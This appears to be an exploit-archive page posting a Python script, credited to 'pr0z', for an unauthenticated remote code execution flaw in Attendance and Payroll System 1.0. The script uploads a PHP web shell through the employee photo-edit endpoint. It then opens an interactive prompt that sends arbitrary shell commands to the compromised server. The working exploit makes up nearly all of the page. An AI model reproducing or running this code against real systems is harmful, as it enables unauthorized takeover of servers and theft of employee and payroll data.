what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Attendance And Payroll System 1.0 Remote Code Execution

Attendance And Payroll System 1.0 Remote Code Execution
Posted Mar 7, 2022
Authored by pr0z

Attendance and Payroll System version 1.0 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | 8a42198f8d9f6fd6fe6e469fc47f164936a51032c097a2a20bc1bf5061b3f2ce

Attendance And Payroll System 1.0 Remote Code Execution

Change Mirror Download
# Exploit Title: Attendance and Payroll System v1.0 - Remote Code Execution (RCE)
# Date: 04/03/2022
# Exploit Author: pr0z
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip
# Version: v1.0
# Tested on: Linux, MySQL, Apache

import requests
import sys
from requests.exceptions import ConnectionError

# Interface class to display terminal messages
class Interface():
def __init__(self):
self.red = '\033[91m'
self.green = '\033[92m'
self.white = '\033[37m'
self.yellow = '\033[93m'
self.bold = '\033[1m'
self.end = '\033[0m'

def header(self):
print('\n >> Attendance and Payroll System v1.0')
print(' >> Unauthenticated Remote Code Execution')
print(' >> By pr0z\n')

def info(self, message):
print(f"[{self.white}*{self.end}] {message}")

def warning(self, message):
print(f"[{self.yellow}!{self.end}] {message}")

def error(self, message):
print(f"[{self.red}x{self.end}] {message}")

def success(self, message):
print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}")


upload_path = '/apsystem/admin/employee_edit_photo.php'
shell_path = '/apsystem/images/shell.php'
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

shell_data = "<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd);}?>"

multipart_form_data = {
'id': 1,
'upload': (''),
}

files = {'photo': ('shell.php', shell_data)}

output = Interface()
output.header()

# Check for arguments
if len(sys.argv) < 2 or '-h' in sys.argv:
output.info("Usage: python3 rce.py http://127.0.0.1")
sys.exit()

# Upload the shell
target = sys.argv[1]
output.info(f"Uploading the web shell to {target}")
r = requests.post(target + upload_path, files=files, data=multipart_form_data, verify=False)

# Validating shell has been uploaded
output.info(f"Validating the shell has been uploaded to {target}")
r = requests.get(target + shell_path, verify=False)
try:
r = requests.get(target + shell_path)
if r.status_code == 200:
output.success('Successfully connected to web shell\n')
else:
raise Exception
except ConnectionError:
output.error('We were unable to establish a connection')
sys.exit()
except:
output.error('Something unexpected happened')
sys.exit()

# Remote code execution
while True:
try:
cmd = input("\033[91mRCE\033[0m > ")
if cmd == 'exit':
raise KeyboardInterrupt
r = requests.get(target + shell_path + "?cmd=" + cmd, verify=False)
if r.status_code == 200:
print(r.text)
else:
raise Exception
except KeyboardInterrupt:
sys.exit()
except ConnectionError:
output.error('We lost our connection to the web shell')
sys.exit()
except:
output.error('Something unexpected happened')
sys.exit()


Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close